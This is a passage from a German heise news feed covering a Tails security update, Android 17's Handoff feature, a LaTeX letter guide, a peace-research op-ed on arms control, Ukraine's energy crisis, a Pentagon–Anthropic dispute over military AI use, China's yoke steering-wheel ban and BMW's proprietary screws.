Vor zwei Wochen hatten die Tails-Maintainer die Fassung 7.4.1 veröffentlicht [6]. Auch dabei handelte es sich schon um ein Notfallupdate, das insbesondere die mitgelieferte OpenSSL-Bibliothek auf den Stand 3.5.4 gebracht hat. Die korrigiert Fehler, die Angreifern das Einschleusen von Schadcode und in der Folge im Tor-Kontext die Deanonymisierung von Nutzern ermöglichen, erklärten die Entwickler dazu.
URL dieses Artikels: https://www.heise.de/-11177279
Links in diesem Artikel: [1] https://www.heise.de/thema/Linux [2] https://tails.net/news/version_7.4.2/ [3] https://lists.debian.org/debian-security-announce/2026/msg00035.html [4] https://tails.net/install/download/index.en.html [5] https://tails.net/install/download-iso/index.en.html [6] https://www.heise.de/news/Anonymisierendes-Linux-Notfall-Update-Tails-7-4-1-erschienen-11162314.html [7] https://pro.heise.de/security/?LPID=39555_HS1L0001_27416_999_0&wt_mc=disp.fd.security-pro.security_pro24.disp.disp.disp [8] mailto:dmk@heise.de
Android 17 bekommt Handoff-Funktion für geräteübergreifende Kontinuität
Von Heise — 16. Februar 2026 um 10:28
Android 17 wird im Juni 2026 zunächst für Pixel-Geräte erwartet.
(Bild: Google)
Android 17 bekommt eine sogenannte Handoff-Funktion, mit der Entwickler eine „geräteübergreifende Kontinuität“ in ihre Apps integrieren können.
Google hat am vergangenen Freitag die erste Beta von Android 17 [1] veröffentlicht. Im Zuge dessen nannte das Unternehmen vor allem entwicklerseitige Neuerungen [2]. Nicht erwähnt hat der Konzern dabei die neue Funktion für die geräteübergreifende Kontinuität namens Handoff (Übergabe).
Handoff zwischen Android-Geräten
Das neue Feature erwähnt Google derweil in der Dokumentation zu Android 17 im Punkt „Funktionen und APIs [3]“, der noch recht überschaubar ist. Laut Google können App-Entwickler die Funktion in ihre Anwendungen integrieren, um Nutzerinnen und Nutzern „eine geräteübergreifende Kontinuität zu bieten“. Damit können Nutzer eine App-Aktivität auf einem Android-Gerät starten und auf ein anderes Android-Gerät übertragen.
Im Unterschied zu Apples oder Microsofts Lösungen ist Googles also nur auf ein Betriebssystem beschränkt. Für die bald erscheinenden Android-PCs mit Aluminium OS [4] dürfte das Feature – oder zwischen Smartphone und Tablet – durchaus praktisch sein. Apple ermöglicht derweil ein Handoff für einige Apps im eigenen Ökosystem zwischen iPhones, Macs und iPads. Microsoft hat [5] hat die Handoff-Funktion zwischen einigen Android-Apps und Windows mit den Patchday-Updates aus dem Februar erweitert.
Wie Google weiter erklärt, wird die Handoff-Funktion im Hintergrund auf dem Gerät eines Nutzers ausgeführt. Sie zeigt verfügbare Aktivitäten von den anderen Geräten des Nutzers in der Nähe über verschiedene Einstiegspunkte wie den Launcher und die Taskleiste auf dem empfangenden Gerät an.
Apps können die Übergabe-Funktion so festlegen, dass dieselbe native Android-App gestartet wird, wenn sie auf dem empfangenden Gerät installiert und verfügbar ist, heißt es weiter. „In diesem App-zu-App-Ablauf wird der Nutzer per Deeplink zur entsprechenden Aktivität weitergeleitet“, beschreibt Google den Ablauf. Alternativ könne die Übergabe von Apps an das Web als Fallback-Option angeboten oder direkt mit der URL-Übergabe implementiert werden. In der Beta 1 sind noch keine Hinweise auf die Handoff-Funktion zu finden.
Google gibt in der Dokumentation eine kurze Information zur Integration von Handoff in Apps: „Die Handoff-Unterstützung wird auf Basis einzelner Aktivitäten implementiert.“ Um Handoff zu aktivieren, müssen Entwickler die Methode setHandoffEnabled()für die Aktivität aufrufen. „Möglicherweise müssen zusätzliche Daten zusammen mit der Übergabe übermittelt werden, damit die neu erstellte Aktivität auf dem empfangenden Gerät den entsprechenden Status wiederherstellen kann. Implementieren Sie den Rückruf onHandoffActivityRequested(), um ein HandoffActivityData-Objekt zurückzugeben, das Details enthält, die angeben, wie Handoff die Aktivität auf dem empfangenden Gerät verarbeiten und neu erstellen soll.“
Was noch?
Neben Handoff nennt Google als weitere neue Android-17-Funktion unter anderem Optimierungen im Bereich Konnektivität, „damit Apps auch in Satellitennetzwerken mit geringer Bandbreite effektiv funktionieren. Detaillierter geht Google nicht auf die Neuerung ein.
Überdies erweitert Google offenbar den mit Android 16 ins System integrierten „Erweiterten Sicherheitsmodus für Android“ [6] (Android Advanced Protection Mode, AAPM), um eine Schnittstelle für App-Entwickler, um den Status des Modus zu erkennen. „So können Anwendungen automatisch eine verstärkte Sicherheitskonfiguration annehmen oder risikoreiche Funktionen einschränken, wenn ein Nutzer sich dafür entschieden hat“, schreibt Google.
URL dieses Artikels: https://www.heise.de/-11177461
Links in diesem Artikel: [1] https://www.heise.de/news/Android-17-Beta-1-ist-da-11176631.html [2] https://www.heise.de/news/Android-17-Beta-1-Google-verschiebt-Release-kurzfristig-Details-bekannt-11173912.html [3] https://developer.android.com/about/versions/17/features [4] https://www.heise.de/news/Google-bereitet-Android-fuer-den-PC-Markt-vor-Aluminium-OS-soll-ChromeOS-abloesen-11092261.html [5] https://www.heise.de/news/Windows-Update-Vorschau-Geraeteuebergreifendes-Fortsetzen-und-MIDI-2-0-11160029.html [6] https://www.heise.de/news/Android-16-Beta-gewaehrt-Blick-auf-Googles-erweitertes-Sicherheitsprogramm-10436392.html [7] https://www.heise.de/newsletter/anmeldung.html?id=ki-update&wt_mc=intern.red.ho.ho_nl_ki.ho.markenbanner.markenbanner [8] mailto:afl@heise.de
heise+ | LaTeX: Professionelle Briefe ohne Layoutstress erstellen
Von Heise — 16. Februar 2026 um 07:00
Ansehnliche Briefe, jedes Mal aufs Neue, ohne mühseliges Gefrickel – LaTeX machts möglich. Wir zeigen, wie Sie Ihre Korrespondenz auf ein neues Niveau heben.
Man könnte meinen, im digitalisierten Zeitalter sei der Brief aus der Mode gekommen. Doch viele Schreiben flattern auch heutzutage noch in traditioneller Briefform ins Haus oder zumindest ins E-Mail-Postfach. Entsprechend erfordern viele Szenarien – sei es die Kündigung des Mietvertrags, die Korrespondenz mit der Behörde oder gar das berufliche Anschreiben – noch immer einen formellen Brief mit klaren gestalterischen Vorgaben.
Schnell kann das in gewöhnlichen Schreibprogrammen frickelig werden. Absender und Adressat müssen an der richtigen Stelle stehen und ändert sich die Zahl der Zeilen, verschiebt sich womöglich das gesamte Layout. Betreff, Anrede und Schlussformel wollen ansehnlich formatiert werden und wer sich eine zusätzliche Absenderzeile für einen Umschlag mit Sichtfenster wünscht, muss diverse Infos mühselig per Hand hin und her kopieren.
Die Lösung bietet LaTeX. Das Textsatzsystem ist vor allem bei Studierenden und in der Wissenschaft beliebt, doch es bietet diverse Features, die bei nahezu jedem Problem des Textsatzes helfen. Im ersten Teil unserer LaTeX-Einführung [7] [7] haben wir Ihnen die Grundlagen des Programms nähergebracht. In diesem Artikel leiten wir Sie durch den Entwurf Ihres ersten Briefs mit LaTeX. Das Gute ist: Wenn Sie Ihre eigene Vorlage angelegt und personalisiert haben, können Sie sie für all Ihre Zwecke wiederverwenden. Alle notwendigen Anpassungen übernimmt LaTeX für Sie.
URL dieses Artikels: https://www.heise.de/-11102025
Links in diesem Artikel: [1] https://www.heise.de/ratgeber/LaTeX-Professionelle-Briefe-ohne-Layoutstress-erstellen-11102025.html [2] https://www.heise.de/ratgeber/Eigene-Menues-fuer-Textbausteine-und-mehr-mit-AutoHotkey-erstellen-11137279.html [3] https://www.heise.de/ratgeber/Einfuehrung-in-das-Textsatzsystem-LaTeX-10446316.html [4] https://www.heise.de/ratgeber/Textsatz-mit-LaTeX-Tipps-und-Tricks-fuer-lange-Texte-10489465.html [5] https://www.heise.de/ratgeber/Programme-zum-Literaturmanagement-im-Test-9821689.html [6] https://www.heise.de/ratgeber/LibreOffice-Writer-Mit-Formatvorlagen-den-Schreiballtag-vereinfachen-9717406.html [7] https://www.heise.de/ratgeber/Einfuehrung-in-das-Textsatzsystem-LaTeX-10446316.html
MSC 2026: Darum fordern Friedensforscher jetzt neue Diplomatie
Von Klaus Moegling — 15. Februar 2026 um 16:00
Rolf Bader,
Klaus Moegling
Friedensforscher warnen: Moderne Industriestaaten haben ein unüberwindbares Problem – Verteidigung ist strukturell unmöglich.
Bündnisverteidigung ist nur dann sinnvoll, wenn das, was verteidigt werden soll, nicht zerstört wird. Doch die aktuell eintretende Rüstungsspirale führt zu mehr Unsicherheit und erhöht die Kriegsgefahr in Europa.
Angelika Wilmen [1], Friedensreferentin bei der Ärzteorganisation IPPNW, bringt dies auf den Punkt:
"Des einen Sicherheit ist des anderen Unsicherheit. Er fühlt sich bedroht und rüstet auf. Das Ergebnis ist eine Rüstungsspirale. Sicherheit entsteht nicht durch die Stationierung von Raketenabwehrsystemen oder Mittelstreckenwaffen, sondern durch Dialog, Abrüstung und Rüstungskontrolle."
Die Verteidigungsetats der Nato-Staaten sollen zukünftig deutlich über zwei Prozent des Bruttoinlandsprodukts ansteigen. Das von der Nato geforderte Ziel wurde inzwischen erfüllt, scheint aber zur Finanzierung der Ausrüstung aus der Sicht von Nato-Experten nicht auszureichen.
Bis 2035 sollen die Etats bis hin zu voluminösen fünf Prozent (incl. für eine militärische Auseinandersetzung erforderlicher Infrastruktur) steigen. Allein für Deutschland bedeutet das weit über 200 Milliarden Euro – und das jedes Jahr.
"In Wahrheit folgt diese Aufrüstung einem transatlantischen Stereotyp und einem instinktiven Reflex, gespeist aus Angst, altem Blockdenken und der Unfähigkeit, eigene Fehlannahmen zu überdenken. Dieses Aufrüsten im Eiltempo basiert auf Worst-Case-Bedrohungsszenarien und Annahmen, die von der Realität weitgehend abgekoppelt sind."
August Pradetto, Berliner Zeitung
Beendigung des New-Start-Vertrags
Erstmals seit 1972 gibt es nun keine wirkungsvolle Beschränkung der Nuklearprogramme der beiden Großmächte mehr. Auch der New-Start-Vertrag wurde bisher ersatzlos beendet.
Die nukleare Teilhabe der Nato in Europa enthält konkrete atomare Kriegsführungsoptionen mit weitreichenden Konsequenzen: Nuklearwaffen könnten chirurgisch gezielt und begrenzt eingesetzt werden. Rüstungstechnisch führt diese Entwicklung zur Miniaturisierung der Atomwaffen mit hoher Zielgenauigkeit sowie sicherheitspolitisch zu einer Herabstufung der Nuklearen Schwelle. [2]
USA, Russland und die VR China – neben den kleineren Atommächten – sind dabei, ihre Nuklearwaffen mit erheblichen Investitionen zu ‚modernisieren‘ und damit noch gefährlicher zu machen.
Innerhalb weniger Wochen könnten nun nach der Beendigung des New-Start-Vertrags die einsatzbereiten nuklearen Arsenale der USA und Russland erheblich vergrößert werden. In relativ kurzer Zeit wäre eine Verdopplung möglich – so die US-Friedensforscherin Jennifer Knox 2026 [3]:
"Die daraus resultierende Aufrüstung, der Mangel an Einblick in die Pläne und Arsenale des jeweils anderen und die Beendigung der formellen bilateralen Konsultationen, die durch das Verifikationssystem des Vertrags hervorgerufen wurden, würden die Beziehungen zwischen den Vereinigten Staaten und Russland weiter destabilisieren, das Risiko eines nuklearen Konflikts durch Fehleinschätzungen oder Missverständnisse erhöhen und Ressourcen verschwenden, die keines der beiden Länder zu verschenken hat.
Eine erneute nukleare Aufrüstungsspirale zwischen den Vereinigten Staaten und Russland könnte auch China und andere Atommächte dazu veranlassen, ihre Arsenale zu vergrößern, was zu einer Verschlechterung der Sicherheitslage weltweit führen würde."
Damit steigt das Risiko eines Atomkriegs aus Versehen [4] deutlich – aufgrund falscher Meldungen oder eines technischen Versagens. Hinzu kommen die Gefährlichkeit und Unberechenbarkeit der Integration von KI [5] in die Waffensysteme.
US-Marschflugkörpern ab 2026 in Deutschland
Ende dieses Jahres wird es voraussichtlich zu einer einschneidenden militärpolitischen Maßnahme in Deutschland mit möglicherweise fatalen Folgen kommen.
Die US-Regierung und die Bundesregierung (Olaf Scholz) vereinbarten in einer kurzen und in der Medienöffentlichkeit kaum beachteten Gemeinsamen Erklärung [6]am Rande des Nato-Gipfels Anfang Juli 2024 in New York die Stationierung amerikanischer Mittelstreckensysteme in Deutschland:
Im Jahr 2026 sollen nur in Deutschland Tomahawk-Marschflugkörper, SM-6-Raketen und neue Hyperschallwaffen stationiert werden, die konventionell und – wenn gefordert – auch mit Atomsprengköpfen bewaffnet werden könnten. Mit über 2.000 km Reichweite könnten sie im Tiefflug in nur wenigen Minuten Zielobjekte in Russland erreichen und sogar sogenannte "Enthauptungsschläge" gegen die russische Führung ausführen.
Beschlossen wurde das Rüstungsprojekt ohne ein gleichzeitiges Verhandlungsangebot an Russland – wie es noch beim Nato-Doppelbeschluss unter Helmut Schmidt der Fall war. Ein dicht besiedeltes Land wie die Bundesrepublik könnte zur Zielscheibe russischer Raketen [7] werden.
Russland hat bereits entsprechende Drohungen ausgesprochen. Während einer Marine-Parade in St. Petersburg sprach Putin deutliche Drohungen [8] angesichts der vorgesehenen Raketen-Stationierung aus – so ntv:
"Putin betonte bei der Parade, dass mit den Raketen, die in der Perspektive auch mit nuklearen Sprengköpfen ausgerüstet werden könnten, wichtige Ziele in Russland in Reichweite gerieten. Staatliche, militärische Objekte und wichtige Industrieanlagen könnten so binnen zehn Minuten getroffen werden. Darauf werde Russland 'spiegelgerecht' antworten. Auch russische Kriegsschiffe könnten demnach mit Raketen als Antwort ausgestattet werden."
Allerdings darf dabei nicht übersehen werden, dass auch Russland nuklearfähige Raketen, in Kaliningrad [9], ca. 500 Kilometer von Berlin entfernt, stationiert hat.
Russische Hyperschallraketen, z. B. seine "Wunderwaffe" Oreschnik, sind bereits im Krieg in der Ukraine eingesetzt [10] worden. Hier wird deutlich, wie wichtig ein Angebot zur gemeinsamen Abrüstung im Zuge einer vorgesehenen Raketen-Stationierung gewesen wäre.
Die deutsche Friedensbewegung nimmt nun die US-Raketenstationierung zum Ende des Jahres 2026 zum zentralen Anlass für Kundgebungen und Appelle (vgl. z. B. den Friedensappell [11] in Bezug auf die geplante Stationierung).
Schlussfolgerung
Die Verletzbarkeit moderner Industriestaaten resultiert aus einer Synergie von Vulnerabilität und vernichtender Waffenwirkung. Die militärische Verteidigung moderner Industriestaaten ist in einem unüberwindbaren Widerspruch gefangen, denn diese sind strukturell nicht zu verteidigen.
Allein die deutsche Stromversorgung lässt sich nicht gegen Cyberangriffe oder Anschläge schützen. Die Folgen wären gesellschaftliches Chaos und Kontrollverlust.
Deshalb sind die Staaten und ihre Gesellschaften nur unter Friedensbedingungen lebens- und funktionsfähig. Das Dilemma der strukturellen Nichtverteidigbarkeit [12] ist Faktizität und verlangt ein Instrumentarium, das Krieg unter allen Umständen präventiv verhindert und über Krisenprävention und Diplomatie zur Deeskalation von Konflikten beiträgt.
Aufgabe der Münchener Sicherheitskonferenz wäre es, sich nach dem Ende des New-Start-Vertrags vordringlich der Rüstungskontrolle zu widmen.
Ziel müsste die Wiederherstellung einer auf Diplomatie und internationaler Zusammenarbeit basierenden Sicherheitsordnung sein. Die internationale Rüstungskontrollarchitektur wiederherzustellen, zu schützen und zu bewahren, ist gegenwärtig die wohl dringlichste Aufgabe.
Im September 2026 kommen die Mitgliedstaaten der Vereinten Nationen in New York zur Überprüfungskonferenz des Nuklearen Nichtverbreitungsvertrags zusammen. Nach dem Ende des New-Start-Vertrags wird es wichtig sein, dass die Staatengemeinschaft den Vertrag in seinen Zielen und Verpflichtungen zumindest bekräftigt.
Ebenfalls eine Verlängerung um ein Jahr, wie von der russischen Regierung vorgeschlagen, wäre wichtig, um einen neuen Start-Vertrag auszuhandeln, für den versucht werden müsste, auch die VR China hinzuzugewinnen. Auch u. a. der im August 2019 beendete INF-Vertrag, der alle landgestützten konventionellen und nuklearen Raketen mit zwischen 500 und 1.500 Kilometern Reichweite verboten hatte, müsste wieder neu verhandelt und eingesetzt werden.
Die Sicherheitskonferenz sollte sich bei der aktuellen geopolitischen Weltlage für eine Stärkung der Vereinten Nationen und die Wahrung der UN-Charta, des Völkerrechts und der Menschenrechte einsetzen.
Rolf Bader, geb. 1950, Dipl. Pädagoge, Offizier a. D. der Bundeswehr, ehemals Geschäftsführer der Deutschen Sektion der Internationalen Ärzte für die Verhütung des Atomkriegs/Ärzte in sozialer Verantwortung e. V. (IPPNW).
Klaus Moegling, Prof. Dr. habil., Politikwissenschaftler und Soziologe, er lehrte an verschiedenen Universitäten und Institutionen der Lehrerbildung, zuletzt an der Universität Kassel als apl. Professor im Fb Gesellschaftswissenschaften, er engagierte sich in der Friedens- und Umweltbewegung sowie in Bildungsinitiativen (Webseite [13]). Er ist Autor des im open Access [14] veröffentlichten Buches "Neuordnung. Eine friedliche und nachhaltig entwickelte Welt ist (noch) möglich".
URL dieses Artikels: https://www.heise.de/-11175163
Die Ukraine friert – und zeigt Europas Verwundbarkeit
Von Julia Engels — 15. Februar 2026 um 14:00
Julia Engels
Wenn Kraftwerke ausfallen, friert ein ganzes Land. Was jetzt in der Ukraine passiert, zeigt die Schwächen zentraler Energiesysteme.
Die Winter in der Ukraine sind bereits hart, doch in diesem Jahr verschärft sich die Lage dramatisch. Während vielerorts Temperaturen bis zu minus 25 °C erreicht werden, sind Strom- und Wärmeversorgung in weiten Teilen des Landes massiv gest [1]ört [2].
Russische Angriffe auf Kraftwerke, Umspannwerke und Fernwärmenetze haben die zentrale Infrastruktur beschädigt oder zerstört. Die unmittelbaren Folgen sind nicht nur technische Ausfälle: Sie betreffen den Alltag, die Gesundheit und die gesellschaftliche Stabilität.
Schulgebäude, Krankenhäuser und Pflegeeinrichtungen arbeiten unter extrem erschwerten Bedingungen. Wasser- und Abwassersysteme, die auf stabile elektrische Energie angewiesen sind, funktionieren nur eingeschränkt. Lebensmittel, die nicht mehr gekühlt oder vor Frost geschützt werden können, verderben.
Diese Situation ist ein humanitäres Desaster, dessen Ursachen nicht allein in der Witterung, sondern in der Verletzlichkeit der zentralisierten Versorgungssysteme liegen.
Zentrale Energieversorgung – Stärke und Schwäche zugleich
Die ukrainische Energieinfrastruktur ist stark zentralisiert: große Kraftwerke, wenige Umspannwerke und ausgedehnte Fernwärmenetze bestimmen die Versorgung von Millionen Menschen.
Solche Strukturen sind effizient, aber eben auch empfindlich. Wenn ein Knotenpunkt ausfällt oder gezielt angegriffen wird, hat dies unmittelbare Auswirkungen auf große Bevölkerungsgruppen. Anders als in dezentral organisierten Systemen können lokale Ausfälle kaum isoliert bleiben, weil wenige Knotenpunkte viele Verbraucher versorgen.
Diese Verwundbarkeit wird im aktuellen Krieg offenkundig. Strom- und Wärmeversorgung sind keine reinen technischen Dienste mehr, sie sind zu kritischen Faktoren für das Überleben im Alltag geworden.
Wenn Heizkraftwerke ausfallen, fällt ein Grundpfeiler des sozialen Lebens aus. Schulen bleiben geschlossen, weil es zu kalt ist. Krankenhäuser müssen Leistungen einschränken, weil medizinische Geräte nicht zuverlässig betrieben werden können.
Alltag im Ausnahmezustand
In betroffenen Regionen harren Familien in schlecht beheizten Wohnungen [4] aus. Viele müssen improvisieren, Kerzen und mobile Heizgeräte verstärkt nutzen, sich in kleineren Gruppen zusammenfinden, um Wärme zu teilen.
Besonders ältere Menschen, chronisch Kranke und Kinder gehören zu den vulnerabelsten Gruppen. Sie sind nicht nur den niedrigen Temperaturen ausgeliefert, sondern auch den indirekten Folgen: verringerte medizinische Betreuung, eingeschränkte Mobilität, psychischer Stress.
Hilfsorganisationen, die ohnehin am Limit arbeiten, sehen sich mit zusätzlichen Herausforderungen konfrontiert. Die Versorgungslage ist nicht nur ein technisches Problem, sondern verlangt logistische Lösungen: Transport von Brennstoffen, Notstromaggregaten, Decken und Lebensmitteln. All dies ist mit erheblichen Kosten, logistischer Komplexität und Sicherheitsrisiken verbunden.
Zugleich verschärfen lange Ausfallzeiten die Gefahr, dass Menschen aus betroffenen Regionen weiterziehen, um in wärmeren Gebieten Schutz zu suchen. Das wiederum setzt lokale Gemeinschaften unter Druck, die ohnehin schon mit Flüchtlingsströmen und Binnenmigration konfrontiert sind.
Resilienz – Begriff und Realität
Der Begriff Resilienz ist in den vergangenen Jahren zum Schlüsselwort geworden, wenn es um die Bewertung von Infrastruktur [5] geht. Er beschreibt die Fähigkeit von Systemen und Gesellschaften, Störungen zu absorbieren, sich anzupassen und weiterhin funktionsfähig zu bleiben.
In der Realität zeigt sich jedoch, dass viele Energieversorgungssysteme dafür nicht ausgelegt sind. Die Abhängigkeit von großen Kraftwerken und weit verzweigten Netzen macht sie effizient, aber wenig widerstandsfähig gegen großflächige Störungen.
Technische Maßnahmen zur Erhöhung der Resilienz wären vielfältig: Dezentrale Energiequellen wie Solaranlagen, Blockheizkraftwerke oder Notstromaggregate könnten zumindest kritische Einrichtungen autonom versorgen.
Redundante Netze und alternative Versorgungswege könnten Ausfälle einzelner Kraftwerke oder Umspannwerke abfedern. Doch solche Maßnahmen sind teuer, erfordern politische Entscheidungen, Planung und Investitionen. Dinge, die inmitten eines Krieges nur schwer zu realisieren sind.
Resilienz ist aber nicht nur eine technische Frage. Sie ist auch eine organisatorische und gesellschaftliche. Vorbereitung auf Notfälle, koordinierte Notfallpläne, schnelle Kommunikation bei Ausfällen und eine funktionierende Krisenlogistik sind ebenso Teil eines resilienten Systems. In der Ukraine wird gerade deutlich, wie sehr diese organisatorischen Kapazitäten auf die Probe gestellt werden.
Gesellschaftliche und politische Implikationen
Die gegenwärtige Lage macht eine weitere Dimension sichtbar: Energieversorgung ist nicht nur ein technisches Gut, sondern ein gesellschaftlich relevantes System, das Sicherheit und Stabilität beeinflusst. Wenn dieses System unter Druck gerät, entstehen nicht nur praktische Probleme, sondern auch politische und gesellschaftliche Spannungen.
Die Bevölkerung wird gezwungen, Prioritäten neu zu setzen: Wie stark werden individuelle Vorsorge, lokale Netzwerke und gegenseitige Hilfe? Wie stark können staatliche Institutionen in Krisenzeiten Unterstützung bieten?
Zugleich eröffnet die Debatte über Resilienz längerfristige Fragen zur Energiepolitik. Welche Rolle spielen dezentrale Systeme in der Zukunft? Wie kann die Energieinfrastruktur so gestaltet werden, dass sie gegen Störungen widerstandsfähiger wird, nicht nur gegen Kriegseinwirkungen, sondern auch gegen Naturkatastrophen und technische Fehlfunktionen? Diese Fragen sind nicht nur für die Ukraine, sondern für viele Gesellschaften relevant, die stark zentralisierte Energieversorgungsmodelle nutzen.
Humanitäre Perspektiven
Für die Menschen vor Ort sind solche konzeptionellen Diskussionen nicht abstrakt, sondern lebensnah. Die unmittelbaren humanitären Folgen: Kälte in Wohnungen, eingeschränkte medizinische Versorgung, psychische Belastung sind greifbar.
Viele Familien leben in ständiger Ungewissheit, wie lange die nächste Heizperiode durchgehalten werden kann, wie lange die Vorräte an Brennstoff reichen oder ob die nächste Nachtruhe ohne Strom und Wärme überstanden wird.
Diese humanitäre Dimension verlangt konkrete Maßnahmen – kurzfristige Hilfe genauso wie langfristige Strategien zur Stärkung der sozialen Infrastruktur und zur Sicherung des Zugangs zu grundlegenden Dienstleistungen.
Die Frage nach Resilienz ist dabei nicht nur technisch, sondern zutiefst menschlich: Es geht um die Fähigkeit von Gesellschaften, unter extremen Bedingungen zu überleben, zu adaptieren und ein Mindestmaß an Normalität aufrechtzuerhalten.
URL dieses Artikels: https://www.heise.de/-11174500
Links in diesem Artikel: [1] https://www.tagesschau.de/ausland/europa/ukraine-ausnahmezustand-energie-infrastruktur-100.html [2] https://www.tagesschau.de/ausland/europa/ukraine-ausnahmezustand-energie-infrastruktur-100.html [3] https://www.stuttgarter-zeitung.de/inhalt.video-ereignisse-zeitgeschehen-ukraine-haertester-winter-im-krieg.62f6a2a2-c136-44b5-ac3a-ad320601ccb9.html [4] https://taz.de/Kriegswinter-in-der-Ukraine/!6148225/ [5] https://www.bundeswirtschaftsministerium.de/Redaktion/DE/Schlaglichter-der-Wirtschaftspolitik/2025/02/05-energieversorgungssicherheit.html
KI: Pentagon droht Anthropic wegen Anti-Kriegsregel
Von Andreas Donath — 15. Februar 2026 um 13:44
Das US-Verteidigungsministerium erwägt die Trennung von Anthropic . Denn das Unternehmen weigert sich, seine KI für militärischen Zwecke freizugeben.
US-HubschrauberBild:
U.S Navy Foto/Oberbootsmann Jon Rasmussen / CC0 1.0
Das Pentagon verlangt von vier großen KI-Unternehmen uneingeschränkten Zugang zu deren Technologie. OpenAI, Google, xAI und Anthropic sollen ihre Modelle für "alle rechtmäßigen Zwecke" bereitstellen. Dazu zählen nach Ansicht des Pentagons Waffenentwicklung, Geheimdienstoperationen und Kampfeinsätze.
Während drei Firmen dem Bericht von Axios zufolge zusagten, stellt sich Anthropic quer. Das Unternehmen bestehe auf Beschränkungen bei der militärischen Nutzung seines KI-Modells Claude, denn dessen Nutzungsrichtlinien verbieten ausdrücklich Gewaltanwendung, Waffenentwicklung und Überwachung.
Ein Regierungsvertreter bestätigte gegenüber dem Nachrichtenportal, dass das Pentagon einen Abbruch der Zusammenarbeit erwäge. Die Verhandlungen laufen seit Monaten – bisher ohne Durchbruch.
Besonders brisant: Das Wall Street Journal berichtete, Claude sei bereits bei der Venezuela-Operation zum Einsatz gekommen. Über die Partnerfirma Palantir wurde die KI offenbar für die Mission zur Ergreifung von Nicolás Maduro genutzt, wie Axios in einem früheren Artikel schreibt .
Technische Fragen bleiben ungeklärt
Ein Anthropic-Sprecher widersprach dieser Darstellung teilweise. Man habe den Einsatz von Claude für "bestimmte Operationen" nicht mit dem Pentagon diskutiert. Die Gespräche hätten sich auf grundsätzliche Aspekte der Nutzungsrichtlinie konzentriert.
Konkret geht es um zwei rote Linien: vollständig autonome Waffensysteme und Massenüberwachung im Inland. Anthropic will verhindern, dass Claude für Waffen verwendet wird, die ohne menschliche Kontrolle töten können. Solche Systeme wählen eigenständig Ziele aus und eliminieren sie.
Wie genau Claude bei der Venezuela-Aktion eingesetzt wurde, bleibt unklar. Die KI kann Dokumente analysieren und Informationen zusammenfassen – ähnlich wie ChatGPT. Ob es nur um Datenauswertung ging oder um direktere Unterstützung, wollte Anthropic nicht kommentieren.
Das Unternehmen betonte lediglich, dass jede Nutzung – privat oder staatlich – den eigenen Richtlinien entsprechen müsse. Man arbeite mit Partnern daran, die Einhaltung sicherzustellen.
Verteidigungsminister Pete Hegseth machte im Januar deutlich , was das Pentagon will: KI-Modelle ohne Einschränkungen. "Wir nutzen keine Modelle, die es nicht erlauben, Kriege zu führen" , sagte er. Das Ministerium schloss parallel einen Vertrag mit Elon Musks Unternehmen xAI.
Der Konflikt zeigt die unterschiedlichen Ansätze in der KI-Branche. Anthropic-Chef Dario Amodei gehört zu den wenigen Tech-Führern, die für strengere Regulierung eintreten. Das brachte ihn bereits auf Kollisionskurs mit David Sacks, dem KI-Beauftragten des Weißen Hauses.
Künstliche Intelligenz verschiebt die Machtverhältnisse in der Rüstungsindustrie dramatisch. Analysten rechnen laut einem Bericht des Spiegel damit, dass KI-gestützte Systeme konventionelle Waffenentwicklung binnen weniger Jahre überholen könnten.
Für Anthropic steht viel auf dem Spiel. Das Pentagon gehört zu den zahlungskräftigsten Kunden der Tech-Branche. Ein Ausschluss würde nicht nur Umsatz kosten, sondern auch strategischen Einfluss.
Halber Lenkkranz: China verbietet Yoke-Lenkräder ab 2027
Von Andreas Donath — 15. Februar 2026 um 13:02
Nach versenkbaren Türgriffen jetzt auch Steuerhörner: In China dürfen Lenkräder ohne vollen Lenkkranz ab Anfang 2027 nicht mehr verbaut werden.
Teslas SteuerhornBild:
David Krasniy/X
Chinas Industrieministerium hat einen Entwurf für einen neuen Sicherheitsstandard veröffentlicht, der Yoke-Lenkräder faktisch verbietet, wie Carnews in China berichtet . Die obligatorische nationale Norm GB 11557-202X soll Fahrer vor Verletzungen durch Lenkmechanismen schützen. Sie ersetzt Richtlinien aus dem Jahr 2011.
Die ab 1. Januar 2027 gültigen Regeln verschärfen die Testpflichten für Hersteller erheblich. Der Standard streicht frühere Ausnahmen von Aufpralltests. Alle Fahrzeugmodelle müssen künftig ausnahmslos Verifikationstests durchlaufen – eine Änderung, die Lenkrad-Designs in der gesamten Branche betrifft.
Technische Hürden für alternative Designs
Der Standard schreibt Aufpralltests an zehn definierten Punkten am Lenkradkranz vor. Zu den erforderlichen Testpositionen gehören der Mittelpunkt der schwächsten Stelle und der Mittelpunkt des kürzesten ungestützten Bereichs.
Halbrunde Lenkräder haben ein entscheidendes Problem: Ihnen fehlt der obere Abschnitt, an dem mehrere kritische Testpunkte liegen müssten. Ohne diese physischen Bereiche können Hersteller die Einhaltung der Anforderungen nicht nachweisen. Diese technische Inkompatibilität macht eine Zulassung nach dem neuen Standard unmöglich.
Mehrere Hersteller bieten derzeit Yoke-Lenkräder auf dem chinesischen Markt an, darunter Tesla, IM Motors, Jiyue und Lexus. Sobald der Standard in Kraft tritt, müssen alle neuen Fahrzeugmodelle die aktualisierten Anforderungen erfüllen. Modelle mit bestehenden Genehmigungen erhalten voraussichtlich eine Übergangsfrist von rund 13 Monaten zur Anpassung ihrer Designs.
Bereits zugelassene Altfahrzeuge müssen nicht umgerüstet werden.
Reparatur-Albtraum: BMW entwickelt proprietäre Marken-Schrauben
Von Andreas Donath — 15. Februar 2026 um 12:31
iFixit nennt BMWs neues Schraubkopfdesign einen "Logo-förmigen Mittelfinger gegen das Reparaturrecht". Hilfe aus 3D-Druckern steht bereit.
Eine 3D-gedruckte Schraube und passendes BitBild:
Adafruit
BMW hat ein Patent für eine neue Schrauben-Konstruktion eingereicht, die das Logo des Herstellers in den Schraubenkopf integriert. Doch ein Blick in die Patentunterlagen zeigt: Das Ziel könnte die Einschränkung unabhängiger Reparaturen sein.
Reparaturrecht unter Beschuss
Die Patentanmeldung formuliert explizit, dass die Schraube verhindern soll, dass "unbefugte Personen" Komponenten lösen oder festziehen. Diese Formulierung provoziert scharfe Kritik. iFixit , eine Reparatur-Website, nennt BMWs Pläne einen "Logo-förmigen Mittelfinger gegen das Reparaturrecht".
Technische Analyse zweifelt an Patentfähigkeit
